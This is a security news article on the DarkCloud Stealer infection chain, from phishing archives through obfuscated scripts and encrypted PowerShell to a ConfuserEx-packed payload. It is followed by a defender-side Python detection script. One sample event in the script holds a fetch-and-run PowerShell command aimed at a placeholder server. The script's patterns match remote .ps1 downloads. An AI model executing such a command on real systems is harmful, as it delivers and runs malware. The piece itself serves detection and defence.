DarkCloud Stealer Uses Novel Infection Chain and ConfuserEx Obfuscation Techniques
gbhackers
Unit 42 researchers have identified a significant evolution in the distribution tactics of DarkCloud Stealer, an infostealer whose shift in delivery mechanisms was first observed in early April 2025.
This update introduces a novel infection chain that incorporates advanced obfuscation via ConfuserEx, culminating in a Visual Basic 6 (VB6) payload designed to thwart static and dynamic analysis.
Obfuscation Strategies
Previously documented attacks relied on AutoIt scripting for evasion, but the latest variants employ multi-layered encryption and protection schemes across three distinct chains, each initiated by phishing emails containing TAR, RAR, or 7Z archives.
These archives deliver obfuscated JavaScript (JS) or Windows Script Files (WSF), which in turn fetch PowerShell (PS1) scripts from open directory servers.

The PS1 scripts, wrapped in Base64 encoding and AES encryption, drop and execute ConfuserEx-protected executables that embed the final DarkCloud payload.
This chain’s complexity, including javascript-obfuscator for JS files and custom AES ...
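As an added defender-side example (not code from the gbhackers or Unit 42 write-up), the following Python sketches detection logic for the chain described above, run over constructed process-creation events: a script host (wscript/cscript, which executes the JS/WSF droppers) spawning PowerShell, a .ps1 pulled from a remote web server, and Base64 decoding combined with AES in the same command line. The event shape, file paths and the URL are assumptions.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 /
# EDR telemetry. None of these values come from the Unit 42 or gbhackers
# write-up; the URL uses an RFC 5737 documentation address.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"iex (iwr http://198.51.100.23/files/stage.ps1)\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\Ops\\nightly-backup.ps1"},
    {"parent": r"C:\Windows\System32\cscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"[Convert]::FromBase64String($b) | Out-Null; "
                "[System.Security.Cryptography.Aes]::Create()\""},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")  # hosts that run JS/WSF droppers
REMOTE_PS1 = re.compile(r"https?://\S+\.ps1\b", re.IGNORECASE)
B64_DECODE = re.compile(r"FromBase64String", re.IGNORECASE)
AES_USE = re.compile(r"(AesCryptoServiceProvider|Cryptography\.Aes|AesManaged)",
                     re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list[str]:
    """Return the chain-stage indicators an event matches; empty means benign."""
    reasons = []
    if basename(event["image"]) != "powershell.exe":
        return reasons
    cmd = event["cmdline"]
    if basename(event["parent"]) in SCRIPT_HOSTS:
        reasons.append("powershell spawned by script host (JS/WSF -> PS1 stage)")
    if REMOTE_PS1.search(cmd):
        reasons.append("remote .ps1 fetched from a web server (open-directory stage)")
    if B64_DECODE.search(cmd) and AES_USE.search(cmd):
        reasons.append("Base64 decode combined with AES (encrypted PS1 layer)")
    return reasons

def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event with at least one indicator."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

The locally launched backup script in the second event matches none of the indicators, which is the false-positive case a rule on PowerShell alone would not distinguish.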
Copyright of this story solely belongs to gbhackers.